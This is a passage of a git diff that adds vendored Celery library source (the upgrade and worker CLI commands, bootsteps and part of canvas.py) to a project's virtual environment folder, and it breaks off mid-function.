ctx.obj.echo(f'{ctx.obj.ERROR}: {e}') + _invoke_default_shell(locals) diff --git a/env/Lib/site-packages/celery/bin/upgrade.py b/env/Lib/site-packages/celery/bin/upgrade.py new file mode 100644 index 00000000..bbfdb044 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/upgrade.py @@ -0,0 +1,91 @@ +"""The ``celery upgrade`` command, used to upgrade from previous versions.""" +import codecs +import sys + +import click + +from celery.app import defaults +from celery.bin.base import CeleryCommand, CeleryOption, handle_preload_options +from celery.utils.functional import pass1 + + +@click.group() +@click.pass_context +@handle_preload_options +def upgrade(ctx): + """Perform upgrade between versions.""" + + +def _slurp(filename): + # TODO: Handle case when file does not exist + with codecs.open(filename, 'r', 'utf-8') as read_fh: + return [line for line in read_fh] + + +def _compat_key(key, namespace='CELERY'): + key = key.upper() + if not key.startswith(namespace): + key = '_'.join([namespace, key]) + return key + + +def _backup(filename, suffix='.orig'): + lines = [] + backup_filename = ''.join([filename, suffix]) + print(f'writing backup to {backup_filename}...', + file=sys.stderr) + with codecs.open(filename, 'r', 'utf-8') as read_fh: + with codecs.open(backup_filename, 'w', 'utf-8') as backup_fh: + for line in read_fh: + backup_fh.write(line) + lines.append(line) + return lines + + +def _to_new_key(line, keyfilter=pass1, source=defaults._TO_NEW_KEY): + # sort by length to avoid, for example, broker_transport overriding + # broker_transport_options. + for old_key in reversed(sorted(source, key=lambda x: len(x))): + new_line = line.replace(old_key, keyfilter(source[old_key])) + if line != new_line and 'CELERY_CELERY' not in new_line: + return 1, new_line # only one match per line. + return 0, line + + +@upgrade.command(cls=CeleryCommand) +@click.argument('filename') +@click.option('--django', + cls=CeleryOption, + is_flag=True, + help_group='Upgrading Options', + help='Upgrade Django project.') +@click.option('--compat', + cls=CeleryOption, + is_flag=True, + help_group='Upgrading Options', + help='Maintain backwards compatibility.') +@click.option('--no-backup', + cls=CeleryOption, + is_flag=True, + help_group='Upgrading Options', + help="Don't backup original files.") +def settings(filename, django, compat, no_backup): + """Migrate settings from Celery 3.x to Celery 4.x.""" + lines = _slurp(filename) + keyfilter = _compat_key if django or compat else pass1 + print(f'processing {filename}...', file=sys.stderr) + # gives list of tuples: ``(did_change, line_contents)`` + new_lines = [ + _to_new_key(line, keyfilter) for line in lines + ] + if any(n[0] for n in new_lines): # did have changes + if not no_backup: + _backup(filename) + with codecs.open(filename, 'w', 'utf-8') as write_fh: + for _, line in new_lines: + write_fh.write(line) + print('Changes to your setting have been made!', + file=sys.stdout) + else: + print('Does not seem to require any changes :-)', + file=sys.stdout) diff --git a/env/Lib/site-packages/celery/bin/worker.py b/env/Lib/site-packages/celery/bin/worker.py new file mode 100644 index 00000000..0cc3d666 --- /dev/null +++ b/env/Lib/site-packages/celery/bin/worker.py @@ -0,0 +1,360 @@ +"""Program used to start a Celery worker instance.""" + +import os +import sys + +import click +from click import ParamType +from click.types import StringParamType + +from celery import concurrency +from celery.bin.base import (COMMA_SEPARATED_LIST, LOG_LEVEL, CeleryDaemonCommand, CeleryOption, + handle_preload_options) +from celery.concurrency.base import BasePool +from celery.exceptions import SecurityError +from celery.platforms import EX_FAILURE, EX_OK, detached, maybe_drop_privileges +from celery.utils.log import get_logger +from celery.utils.nodenames import default_nodename, host_format, node_format + +logger = get_logger(__name__) + + +class CeleryBeat(ParamType): + """Celery Beat flag.""" + + name = "beat" + + def convert(self, value, param, ctx): + if ctx.obj.app.IS_WINDOWS and value: + self.fail('-B option does not work on Windows. ' + 'Please run celery beat as a separate service.') + + return value + + +class WorkersPool(click.Choice): + """Workers pool option.""" + + name = "pool" + + def __init__(self): + """Initialize the workers pool option with the relevant choices.""" + super().__init__(concurrency.get_available_pool_names()) + + def convert(self, value, param, ctx): + # Pools like eventlet/gevent needs to patch libs as early + # as possible. + if isinstance(value, type) and issubclass(value, BasePool): + return value + + value = super().convert(value, param, ctx) + worker_pool = ctx.obj.app.conf.worker_pool + if value == 'prefork' and worker_pool: + # If we got the default pool through the CLI + # we need to check if the worker pool was configured. + # If the worker pool was configured, we shouldn't use the default. + value = concurrency.get_implementation(worker_pool) + else: + value = concurrency.get_implementation(value) + + if not value: + value = concurrency.get_implementation(worker_pool) + + return value + + +class Hostname(StringParamType): + """Hostname option.""" + + name = "hostname" + + def convert(self, value, param, ctx): + return host_format(default_nodename(value)) + + +class Autoscale(ParamType): + """Autoscaling parameter.""" + + name = ", " + + def convert(self, value, param, ctx): + value = value.split(',') + + if len(value) > 2: + self.fail("Expected two comma separated integers or one integer." + f"Got {len(value)} instead.") + + if len(value) == 1: + try: + value = (int(value[0]), 0) + except ValueError: + self.fail(f"Expected an integer. Got {value} instead.") + + try: + return tuple(reversed(sorted(map(int, value)))) + except ValueError: + self.fail("Expected two comma separated integers." + f"Got {value.join(',')} instead.") + + +CELERY_BEAT = CeleryBeat() +WORKERS_POOL = WorkersPool() +HOSTNAME = Hostname() +AUTOSCALE = Autoscale() + +C_FAKEFORK = os.environ.get('C_FAKEFORK') + + +def detach(path, argv, logfile=None, pidfile=None, uid=None, + gid=None, umask=None, workdir=None, fake=False, app=None, + executable=None, hostname=None): + """Detach program by argv.""" + fake = 1 if C_FAKEFORK else fake + # `detached()` will attempt to touch the logfile to confirm that error + # messages won't be lost after detaching stdout/err, but this means we need + # to pre-format it rather than relying on `setup_logging_subsystem()` like + # we can elsewhere. + logfile = node_format(logfile, hostname) + with detached(logfile, pidfile, uid, gid, umask, workdir, fake, + after_forkers=False): + try: + if executable is not None: + path = executable + os.execv(path, [path] + argv) + return EX_OK + except Exception: # pylint: disable=broad-except + if app is None: + from celery import current_app + app = current_app + app.log.setup_logging_subsystem( + 'ERROR', logfile, hostname=hostname) + logger.critical("Can't exec %r", ' '.join([path] + argv), + exc_info=True) + return EX_FAILURE + + +@click.command(cls=CeleryDaemonCommand, + context_settings={'allow_extra_args': True}) +@click.option('-n', + '--hostname', + default=host_format(default_nodename(None)), + cls=CeleryOption, + type=HOSTNAME, + help_group="Worker Options", + help="Set custom hostname (e.g., 'w1@%%h'). " + "Expands: %%h (hostname), %%n (name) and %%d, (domain).") +@click.option('-D', + '--detach', + cls=CeleryOption, + is_flag=True, + default=False, + help_group="Worker Options", + help="Start worker as a background process.") +@click.option('-S', + '--statedb', + cls=CeleryOption, + type=click.Path(), + callback=lambda ctx, _, + value: value or ctx.obj.app.conf.worker_state_db, + help_group="Worker Options", + help="Path to the state database. The extension '.db' may be " + "appended to the filename.") +@click.option('-l', + '--loglevel', + default='WARNING', + cls=CeleryOption, + type=LOG_LEVEL, + help_group="Worker Options", + help="Logging level.") +@click.option('-O', + '--optimization', + default='default', + cls=CeleryOption, + type=click.Choice(('default', 'fair')), + help_group="Worker Options", + help="Apply optimization profile.") +@click.option('--prefetch-multiplier', + type=int, + metavar="", + callback=lambda ctx, _, + value: value or ctx.obj.app.conf.worker_prefetch_multiplier, + cls=CeleryOption, + help_group="Worker Options", + help="Set custom prefetch multiplier value " + "for this worker instance.") +@click.option('-c', + '--concurrency', + type=int, + metavar="", + callback=lambda ctx, _, + value: value or ctx.obj.app.conf.worker_concurrency, + cls=CeleryOption, + help_group="Pool Options", + help="Number of child processes processing the queue. " + "The default is the number of CPUs available" + " on your system.") +@click.option('-P', + '--pool', + default='prefork', + type=WORKERS_POOL, + cls=CeleryOption, + help_group="Pool Options", + help="Pool implementation.") +@click.option('-E', + '--task-events', + '--events', + is_flag=True, + default=None, + cls=CeleryOption, + help_group="Pool Options", + help="Send task-related events that can be captured by monitors" + " like celery events, celerymon, and others.") +@click.option('--time-limit', + type=float, + cls=CeleryOption, + help_group="Pool Options", + help="Enables a hard time limit " + "(in seconds int/float) for tasks.") +@click.option('--soft-time-limit', + type=float, + cls=CeleryOption, + help_group="Pool Options", + help="Enables a soft time limit " + "(in seconds int/float) for tasks.") +@click.option('--max-tasks-per-child', + type=int, + cls=CeleryOption, + help_group="Pool Options", + help="Maximum number of tasks a pool worker can execute before " + "it's terminated and replaced by a new worker.") +@click.option('--max-memory-per-child', + type=int, + cls=CeleryOption, + help_group="Pool Options", + help="Maximum amount of resident memory, in KiB, that may be " + "consumed by a child process before it will be replaced " + "by a new one. If a single task causes a child process " + "to exceed this limit, the task will be completed and " + "the child process will be replaced afterwards.\n" + "Default: no limit.") +@click.option('--purge', + '--discard', + is_flag=True, + cls=CeleryOption, + help_group="Queue Options") +@click.option('--queues', + '-Q', + type=COMMA_SEPARATED_LIST, + cls=CeleryOption, + help_group="Queue Options") +@click.option('--exclude-queues', + '-X', + type=COMMA_SEPARATED_LIST, + cls=CeleryOption, + help_group="Queue Options") +@click.option('--include', + '-I', + type=COMMA_SEPARATED_LIST, + cls=CeleryOption, + help_group="Queue Options") +@click.option('--without-gossip', + is_flag=True, + cls=CeleryOption, + help_group="Features") +@click.option('--without-mingle', + is_flag=True, + cls=CeleryOption, + help_group="Features") +@click.option('--without-heartbeat', + is_flag=True, + cls=CeleryOption, + help_group="Features", ) +@click.option('--heartbeat-interval', + type=int, + cls=CeleryOption, + help_group="Features", ) +@click.option('--autoscale', + type=AUTOSCALE, + cls=CeleryOption, + help_group="Features", ) +@click.option('-B', + '--beat', + type=CELERY_BEAT, + cls=CeleryOption, + is_flag=True, + help_group="Embedded Beat Options") +@click.option('-s', + '--schedule-filename', + '--schedule', + callback=lambda ctx, _, + value: value or ctx.obj.app.conf.beat_schedule_filename, + cls=CeleryOption, + help_group="Embedded Beat Options") +@click.option('--scheduler', + cls=CeleryOption, + help_group="Embedded Beat Options") +@click.pass_context +@handle_preload_options +def worker(ctx, hostname=None, pool_cls=None, app=None, uid=None, gid=None, + loglevel=None, logfile=None, pidfile=None, statedb=None, + **kwargs): + """Start worker instance. + + \b + Examples + -------- + + \b + $ celery --app=proj worker -l INFO + $ celery -A proj worker -l INFO -Q hipri,lopri + $ celery -A proj worker --concurrency=4 + $ celery -A proj worker --concurrency=1000 -P eventlet + $ celery worker --autoscale=10,0 + + """ + try: + app = ctx.obj.app + if ctx.args: + try: + app.config_from_cmdline(ctx.args, namespace='worker') + except (KeyError, ValueError) as e: + # TODO: Improve the error messages + raise click.UsageError( + "Unable to parse extra configuration from command line.\n" + f"Reason: {e}", ctx=ctx) + if kwargs.get('detach', False): + argv = ['-m', 'celery'] + sys.argv[1:] + if '--detach' in argv: + argv.remove('--detach') + if '-D' in argv: + argv.remove('-D') + if "--uid" in argv: + argv.remove('--uid') + if "--gid" in argv: + argv.remove('--gid') + + return detach(sys.executable, + argv, + logfile=logfile, + pidfile=pidfile, + uid=uid, gid=gid, + umask=kwargs.get('umask', None), + workdir=kwargs.get('workdir', None), + app=app, + executable=kwargs.get('executable', None), + hostname=hostname) + + maybe_drop_privileges(uid=uid, gid=gid) + worker = app.Worker( + hostname=hostname, pool_cls=pool_cls, loglevel=loglevel, + logfile=logfile, # node format handled by celery.app.log.setup + pidfile=node_format(pidfile, hostname), + statedb=node_format(statedb, hostname), + no_color=ctx.obj.no_color, + quiet=ctx.obj.quiet, + **kwargs) + worker.start() + ctx.exit(worker.exitcode) + except SecurityError as e: + ctx.obj.error(e.args[0]) + ctx.exit(1) diff --git a/env/Lib/site-packages/celery/bootsteps.py b/env/Lib/site-packages/celery/bootsteps.py new file mode 100644 index 00000000..87856062 --- /dev/null +++ b/env/Lib/site-packages/celery/bootsteps.py @@ -0,0 +1,415 @@ +"""A directed acyclic graph of reusable components.""" + +from collections import deque +from threading import Event + +from kombu.common import ignore_errors +from kombu.utils.encoding import bytes_to_str +from kombu.utils.imports import symbol_by_name + +from .utils.graph import DependencyGraph, GraphFormatter +from .utils.imports import instantiate, qualname +from .utils.log import get_logger + +try: + from greenlet import GreenletExit +except ImportError: + IGNORE_ERRORS = () +else: + IGNORE_ERRORS = (GreenletExit,) + +__all__ = ('Blueprint', 'Step', 'StartStopStep', 'ConsumerStep') + +#: States +RUN = 0x1 +CLOSE = 0x2 +TERMINATE = 0x3 + +logger = get_logger(__name__) + + +def _pre(ns, fmt): + return f'| {ns.alias}: {fmt}' + + +def _label(s): + return s.name.rsplit('.', 1)[-1] + + +class StepFormatter(GraphFormatter): + """Graph formatter for :class:`Blueprint`.""" + + blueprint_prefix = '⧉' + conditional_prefix = '∘' + blueprint_scheme = { + 'shape': 'parallelogram', + 'color': 'slategray4', + 'fillcolor': 'slategray3', + } + + def label(self, step): + return step and '{}{}'.format( + self._get_prefix(step), + bytes_to_str( + (step.label or _label(step)).encode('utf-8', 'ignore')), + ) + + def _get_prefix(self, step): + if step.last: + return self.blueprint_prefix + if step.conditional: + return self.conditional_prefix + return '' + + def node(self, obj, **attrs): + scheme = self.blueprint_scheme if obj.last else self.node_scheme + return self.draw_node(obj, scheme, attrs) + + def edge(self, a, b, **attrs): + if a.last: + attrs.update(arrowhead='none', color='darkseagreen3') + return self.draw_edge(a, b, self.edge_scheme, attrs) + + +class Blueprint: + """Blueprint containing bootsteps that can be applied to objects. + + Arguments: + steps Sequence[Union[str, Step]]: List of steps. + name (str): Set explicit name for this blueprint. + on_start (Callable): Optional callback applied after blueprint start. + on_close (Callable): Optional callback applied before blueprint close. + on_stopped (Callable): Optional callback applied after + blueprint stopped. + """ + + GraphFormatter = StepFormatter + + name = None + state = None + started = 0 + default_steps = set() + state_to_name = { + 0: 'initializing', + RUN: 'running', + CLOSE: 'closing', + TERMINATE: 'terminating', + } + + def __init__(self, steps=None, name=None, + on_start=None, on_close=None, on_stopped=None): + self.name = name or self.name or qualname(type(self)) + self.types = set(steps or []) | set(self.default_steps) + self.on_start = on_start + self.on_close = on_close + self.on_stopped = on_stopped + self.shutdown_complete = Event() + self.steps = {} + + def start(self, parent): + self.state = RUN + if self.on_start: + self.on_start() + for i, step in enumerate(s for s in parent.steps if s is not None): + self._debug('Starting %s', step.alias) + self.started = i + 1 + step.start(parent) + logger.debug('^-- substep ok') + + def human_state(self): + return self.state_to_name[self.state or 0] + + def info(self, parent): + info = {} + for step in parent.steps: + info.update(step.info(parent) or {}) + return info + + def close(self, parent): + if self.on_close: + self.on_close() + self.send_all(parent, 'close', 'closing', reverse=False) + + def restart(self, parent, method='stop', + description='restarting', propagate=False): + self.send_all(parent, method, description, propagate=propagate) + + def send_all(self, parent, method, + description=None, reverse=True, propagate=True, args=()): + description = description or method.replace('_', ' ') + steps = reversed(parent.steps) if reverse else parent.steps + for step in steps: + if step: + fun = getattr(step, method, None) + if fun is not None: + self._debug('%s %s...', + description.capitalize(), step.alias) + try: + fun(parent, *args) + except Exception as exc: # pylint: disable=broad-except + if propagate: + raise + logger.exception( + 'Error on %s %s: %r', description, step.alias, exc) + + def stop(self, parent, close=True, terminate=False): + what = 'terminating' if terminate else 'stopping' + if self.state in (CLOSE, TERMINATE): + return + + if self.state != RUN or self.started != len(parent.steps): + # Not fully started, can safely exit. + self.state = TERMINATE + self.shutdown_complete.set() + return + self.close(parent) + self.state = CLOSE + + self.restart( + parent, 'terminate' if terminate else 'stop', + description=what, propagate=False, + ) + + if self.on_stopped: + self.on_stopped() + self.state = TERMINATE + self.shutdown_complete.set() + + def join(self, timeout=None): + try: + # Will only get here if running green, + # makes sure all greenthreads have exited. + self.shutdown_complete.wait(timeout=timeout) + except IGNORE_ERRORS: + pass + + def apply(self, parent, **kwargs): + """Apply the steps in this blueprint to an object. + + This will apply the ``__init__`` and ``include`` methods + of each step, with the object as argument:: + + step = Step(obj) + ... + step.include(obj) + + For :class:`StartStopStep` the services created + will also be added to the objects ``steps`` attribute. + """ + self._debug('Preparing bootsteps.') + order = self.order = [] + steps = self.steps = self.claim_steps() + + self._debug('Building graph...') + for S in self._finalize_steps(steps): + step = S(parent, **kwargs) + steps[step.name] = step + order.append(step) + self._debug('New boot order: {%s}', + ', '.join(s.alias for s in self.order)) + for step in order: + step.include(parent) + return self + + def connect_with(self, other): + self.graph.adjacent.update(other.graph.adjacent) + self.graph.add_edge(type(other.order[0]), type(self.order[-1])) + + def __getitem__(self, name): + return self.steps[name] + + def _find_last(self): + return next((C for C in self.steps.values() if C.last), None) + + def _firstpass(self, steps): + for step in steps.values(): + step.requires = [symbol_by_name(dep) for dep in step.requires] + stream = deque(step.requires for step in steps.values()) + while stream: + for node in stream.popleft(): + node = symbol_by_name(node) + if node.name not in self.steps: + steps[node.name] = node + stream.append(node.requires) + + def _finalize_steps(self, steps): + last = self._find_last() + self._firstpass(steps) + it = ((C, C.requires) for C in steps.values()) + G = self.graph = DependencyGraph( + it, formatter=self.GraphFormatter(root=last), + ) + if last: + for obj in G: + if obj != last: + G.add_edge(last, obj) + try: + return G.topsort() + except KeyError as exc: + raise KeyError('unknown bootstep: %s' % exc) + + def claim_steps(self): + return dict(self.load_step(step) for step in self.types) + + def load_step(self, step): + step = symbol_by_name(step) + return step.name, step + + def _debug(self, msg, *args): + return logger.debug(_pre(self, msg), *args) + + @property + def alias(self): + return _label(self) + + +class StepType(type): + """Meta-class for steps.""" + + name = None + requires = None + + def __new__(cls, name, bases, attrs): + module = attrs.get('__module__') + qname = f'{module}.{name}' if module else name + attrs.update( + __qualname__=qname, + name=attrs.get('name') or qname, + ) + return super().__new__(cls, name, bases, attrs) + + def __str__(cls): + return cls.name + + def __repr__(cls): + return 'step:{0.name}{{{0.requires!r}}}'.format(cls) + + +class Step(metaclass=StepType): + """A Bootstep. + + The :meth:`__init__` method is called when the step + is bound to a parent object, and can as such be used + to initialize attributes in the parent object at + parent instantiation-time. + """ + + #: Optional step name, will use ``qualname`` if not specified. + name = None + + #: Optional short name used for graph outputs and in logs. + label = None + + #: Set this to true if the step is enabled based on some condition. + conditional = False + + #: List of other steps that that must be started before this step. + #: Note that all dependencies must be in the same blueprint. + requires = () + + #: This flag is reserved for the workers Consumer, + #: since it is required to always be started last. + #: There can only be one object marked last + #: in every blueprint. + last = False + + #: This provides the default for :meth:`include_if`. + enabled = True + + def __init__(self, parent, **kwargs): + pass + + def include_if(self, parent): + """Return true if bootstep should be included. + + You can define this as an optional predicate that decides whether + this step should be created. + """ + return self.enabled + + def instantiate(self, name, *args, **kwargs): + return instantiate(name, *args, **kwargs) + + def _should_include(self, parent): + if self.include_if(parent): + return True, self.create(parent) + return False, None + + def include(self, parent): + return self._should_include(parent)[0] + + def create(self, parent): + """Create the step.""" + + def __repr__(self): + return f'' + + @property + def alias(self): + return self.label or _label(self) + + def info(self, obj): + pass + + +class StartStopStep(Step): + """Bootstep that must be started and stopped in order.""" + + #: Optional obj created by the :meth:`create` method. + #: This is used by :class:`StartStopStep` to keep the + #: original service object. + obj = None + + def start(self, parent): + if self.obj: + return self.obj.start() + + def stop(self, parent): + if self.obj: + return self.obj.stop() + + def close(self, parent): + pass + + def terminate(self, parent): + if self.obj: + return getattr(self.obj, 'terminate', self.obj.stop)() + + def include(self, parent): + inc, ret = self._should_include(parent) + if inc: + self.obj = ret + parent.steps.append(self) + return inc + + +class ConsumerStep(StartStopStep): + """Bootstep that starts a message consumer.""" + + requires = ('celery.worker.consumer:Connection',) + consumers = None + + def get_consumers(self, channel): + raise NotImplementedError('missing get_consumers') + + def start(self, c): + channel = c.connection.channel() + self.consumers = self.get_consumers(channel) + for consumer in self.consumers or []: + consumer.consume() + + def stop(self, c): + self._close(c, True) + + def shutdown(self, c): + self._close(c, False) + + def _close(self, c, cancel_consumers=True): + channels = set() + for consumer in self.consumers or []: + if cancel_consumers: + ignore_errors(c.connection, consumer.cancel) + if consumer.channel: + channels.add(consumer.channel) + for channel in channels: + ignore_errors(c.connection, channel.close) diff --git a/env/Lib/site-packages/celery/canvas.py b/env/Lib/site-packages/celery/canvas.py new file mode 100644 index 00000000..a4007f0a --- /dev/null +++ b/env/Lib/site-packages/celery/canvas.py @@ -0,0 +1,2394 @@ +"""Composing task work-flows. + +.. seealso: + + You should import these from :mod:`celery` and not this module. +""" + +import itertools +import operator +import warnings +from abc import ABCMeta, abstractmethod +from collections import deque +from collections.abc import MutableSequence +from copy import deepcopy +from functools import partial as _partial +from functools import reduce +from operator import itemgetter +from types import GeneratorType + +from kombu.utils.functional import fxrange, reprcall +from kombu.utils.objects import cached_property +from kombu.utils.uuid import uuid +from vine import barrier + +from celery._state import current_app +from celery.exceptions import CPendingDeprecationWarning +from celery.result import GroupResult, allow_join_result +from celery.utils import abstract +from celery.utils.collections import ChainMap +from celery.utils.functional import _regen +from celery.utils.functional import chunks as _chunks +from celery.utils.functional import is_list, maybe_list, regen, seq_concat_item, seq_concat_seq +from celery.utils.objects import getitem_property +from celery.utils.text import remove_repeating_from_task, truncate + +__all__ = ( + 'Signature', 'chain', 'xmap', 'xstarmap', 'chunks', + 'group', 'chord', 'signature', 'maybe_signature', +) + + +def maybe_unroll_group(group): + """Unroll group with only one member. + This allows treating a group of a single task as if it + was a single task without pre-knowledge.""" + # Issue #1656 + try: + size = len(group.tasks) + except TypeError: + try: + size = group.tasks.__length_hint__() + except (AttributeError, TypeError): + return group + else: + return list(group.tasks)[0] if size == 1 else group + else: + return group.tasks[0] if size == 1 else group + + +def task_name_from(task): + return getattr(task, 'name', task) + + +def _stamp_regen_task(task, visitor, append_stamps, **headers): + """When stamping a sequence of tasks created by a generator, + we use this function to stamp each task in the generator + without exhausting it.""" + + task.stamp(visitor, append_stamps, **headers) + return task + + +def _merge_dictionaries(d1, d2, aggregate_duplicates=True): + """Merge two dictionaries recursively into the first one. + + Example: + >>> d1 = {'dict': {'a': 1}, 'list': [1, 2], 'tuple': (1, 2)} + >>> d2 = {'dict': {'b': 2}, 'list': [3, 4], 'set': {'a', 'b'}} + >>> _merge_dictionaries(d1, d2) + + d1 will be modified to: { + 'dict': {'a': 1, 'b': 2}, + 'list': [1, 2, 3, 4], + 'tuple': (1, 2), + 'set': {'a', 'b'} + } + + Arguments: + d1 (dict): Dictionary to merge into. + d2 (dict): Dictionary to merge from. + aggregate_duplicates (bool): + If True, aggregate duplicated items (by key) into a list of all values in d1 in the same key. + If False, duplicate keys will be taken from d2 and override the value in d1. + """ + if not d2: + return + + for key, value in d1.items(): + if key in d2: + if isinstance(value, dict): + _merge_dictionaries(d1[key], d2[key]) + else: + if isinstance(value, (int, float, str)): + d1[key] = [value] if aggregate_duplicates else value + if isinstance(d2[key], list) and isinstance(d1[key], list): + d1[key].extend(d2[key]) + elif aggregate_duplicates: + if d1[key] is None: + d1[key] = [] + else: + d1[key] = list(d1[key]) + d1[key].append(d2[key]) + for key, value in d2.items(): + if key not in d1: + d1[key] = value + + +class StampingVisitor(metaclass=ABCMeta): + """Stamping API. A class that provides a stamping API possibility for + canvas primitives. If you want to implement stamping behavior for + a canvas primitive override method that represents it. + """ + + def on_group_start(self, group, **headers) -> dict: + """Method that is called on group stamping start. + + Arguments: + group (group): Group that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + return {} + + def on_group_end(self, group, **headers) -> None: + """Method that is called on group stamping end. + + Arguments: + group (group): Group that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + """ + pass + + def on_chain_start(self, chain, **headers) -> dict: + """Method that is called on chain stamping start. + + Arguments: + chain (chain): Chain that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + return {} + + def on_chain_end(self, chain, **headers) -> None: + """Method that is called on chain stamping end. + + Arguments: + chain (chain): Chain that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + """ + pass + + @abstractmethod + def on_signature(self, sig, **headers) -> dict: + """Method that is called on signature stamping. + + Arguments: + sig (Signature): Signature that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + + def on_chord_header_start(self, sig, **header) -> dict: + """Method that is called on сhord header stamping start. + + Arguments: + sig (chord): chord that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + if not isinstance(sig.tasks, group): + sig.tasks = group(sig.tasks) + return self.on_group_start(sig.tasks, **header) + + def on_chord_header_end(self, sig, **header) -> None: + """Method that is called on сhord header stamping end. + + Arguments: + sig (chord): chord that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + """ + self.on_group_end(sig.tasks, **header) + + def on_chord_body(self, sig, **header) -> dict: + """Method that is called on chord body stamping. + + Arguments: + sig (chord): chord that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + return {} + + def on_callback(self, callback, **header) -> dict: + """Method that is called on callback stamping. + + Arguments: + callback (Signature): callback that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + return {} + + def on_errback(self, errback, **header) -> dict: + """Method that is called on errback stamping. + + Arguments: + errback (Signature): errback that is stamped. + headers (Dict): Partial headers that could be merged with existing headers. + Returns: + Dict: headers to update. + """ + return {} + + +@abstract.CallableSignature.register +class Signature(dict): + """Task Signature. + + Class that wraps the arguments and execution options + for a single task invocation. + + Used as the parts in a :class:`group` and other constructs, + or to pass tasks around as callbacks while being compatible + with serializers with a strict type subset. + + Signatures can also be created from tasks: + + - Using the ``.signature()`` method that has the same signature + as ``Task.apply_async``: + + .. code-block:: pycon + + >>> add.signature(args=(1,), kwargs={'kw': 2}, options={}) + + - or the ``.s()`` shortcut that works for star arguments: + + .. code-block:: pycon + + >>> add.s(1, kw=2) + + - the ``.s()`` shortcut does not allow you to specify execution options + but there's a chaining `.set` method that returns the signature: + + .. code-block:: pycon + + >>> add.s(2, 2).set(countdown=10).set(expires=30).delay() + + Note: + You should use :func:`~celery.signature` to create new signatures. + The ``Signature`` class is the type returned by that function and + should be used for ``isinstance`` checks for signatures. + + See Also: + :ref:`guide-canvas` for the complete guide. + + Arguments: + task (Union[Type[celery.app.task.Task], str]): Either a task + class/instance, or the name of a task. + args (Tuple): Positional arguments to apply. + kwargs (Dict): Keyword arguments to apply. + options (Dict): Additional options to :meth:`Task.apply_async`. + + Note: + If the first argument is a :class:`dict`, the other + arguments will be ignored and the values in the dict will be used + instead:: + + >>> s = signature('tasks.add', args=(2, 2)) + >>> signature(s) + {'task': 'tasks.add', args=(2, 2), kwargs={}, options={}} + """ + + TYPES = {} + _app = _type = None + # The following fields must not be changed during freezing/merging because + # to do so would disrupt completion of parent tasks + _IMMUTABLE_OPTIONS = {"group_id", "stamped_headers"} + + @classmethod + def register_type(cls, name=None): + """Register a new type of signature. + Used as a class decorator, for example: + >>> @Signature.register_type() + >>> class mysig(Signature): + >>> pass + """ + def _inner(subclass): + cls.TYPES[name or subclass.__name__] = subclass + return subclass + + return _inner + + @classmethod + def from_dict(cls, d, app=None): + """Create a new signature from a dict. + Subclasses can override this method to customize how are + they created from a dict. + """ + typ = d.get('subtask_type') + if typ: + target_cls = cls.TYPES[typ] + if target_cls is not cls: + return target_cls.from_dict(d, app=app) + return Signature(d, app=app) + + def __init__(self, task=None, args=None, kwargs=None, options=None, + type=None, subtask_type=None, immutable=False, + app=None, **ex): + self._app = app + + if isinstance(task, dict): + super().__init__(task) # works like dict(d) + else: + # Also supports using task class/instance instead of string name. + try: + task_name = task.name + except AttributeError: + task_name = task + else: + self._type = task + + super().__init__( + task=task_name, args=tuple(args or ()), + kwargs=kwargs or {}, + options=dict(options or {}, **ex), + subtask_type=subtask_type, + immutable=immutable, + ) + + def __call__(self, *partial_args, **partial_kwargs): + """Call the task directly (in the current process).""" + args, kwargs, _ = self._merge(partial_args, partial_kwargs, None) + return self.type(*args, **kwargs) + + def delay(self, *partial_args, **partial_kwargs): + """Shortcut to :meth:`apply_async` using star arguments.""" + return self.apply_async(partial_args, partial_kwargs) + + def apply(self, args=None, kwargs=None, **options): + """Call task locally. + + Same as :meth:`apply_async` but executed the task inline instead + of sending a task message. + """ + args = args if args else () + kwargs = kwargs if kwargs else {} + # Extra options set to None are dismissed + options = {k: v for k, v in options.items() if v is not None} + # For callbacks: extra args are prepended to the stored args. + args, kwargs, options = self._merge(args, kwargs, options) + return self.type.apply(args, kwargs, **options) + + def apply_async(self, args=None, kwargs=None, route_name=None, **options): + """Apply this task asynchronously. + + Arguments: + args (Tuple): Partial args to be prepended to the existing args. + kwargs (Dict): Partial kwargs to be merged with existing kwargs. + options (Dict): Partial options to be merged + with existing options. + + Returns: + ~@AsyncResult: promise of future evaluation. + + See also: + :meth:`~@Task.apply_async` and the :ref:`guide-calling` guide. + """ + args = args if args else () + kwargs = kwargs if kwargs else {} + # Extra options set to None are dismissed + options = {k: v for k, v in options.items() if v is not None} + try: + _apply = self._apply_async + except IndexError: # pragma: no cover + # no tasks for chain, etc to find type + return + # For callbacks: extra args are prepended to the stored args. + if args or kwargs or options: + args, kwargs, options = self._merge(args, kwargs, options) + else: + args, kwargs, options = self.args, self.kwargs, self.options + # pylint: disable=too-many-function-args + # Borks on this, as it's a property + return _apply(args, kwargs, **options) + + def _merge(self, args=None, kwargs=None, options=None, force=False): + """Merge partial args/kwargs/options with existing ones. + + If the signature is immutable and ``force`` is False, the existing + args/kwargs will be returned as-is and only the options will be merged. + + Stamped headers are considered immutable and will not be merged regardless. + + Arguments: + args (Tuple): Partial args to be prepended to the existing args. + kwargs (Dict): Partial kwargs to be merged with existing kwargs. + options (Dict): Partial options to be merged with existing options. + force (bool): If True, the args/kwargs will be merged even if the signature is + immutable. The stamped headers are not affected by this option and will not + be merged regardless. + + Returns: + Tuple: (args, kwargs, options) + """ + args = args if args else () + kwargs = kwargs if kwargs else {} + if options is not None: + # We build a new options dictionary where values in `options` + # override values in `self.options` except for keys which are + # noted as being immutable (unrelated to signature immutability) + # implying that allowing their value to change would stall tasks + immutable_options = self._IMMUTABLE_OPTIONS + if "stamped_headers" in self.options: + immutable_options = self._IMMUTABLE_OPTIONS.union(set(self.options.get("stamped_headers", []))) + # merge self.options with options without overriding stamped headers from self.options + new_options = {**self.options, **{ + k: v for k, v in options.items() + if k not in immutable_options or k not in self.options + }} + else: + 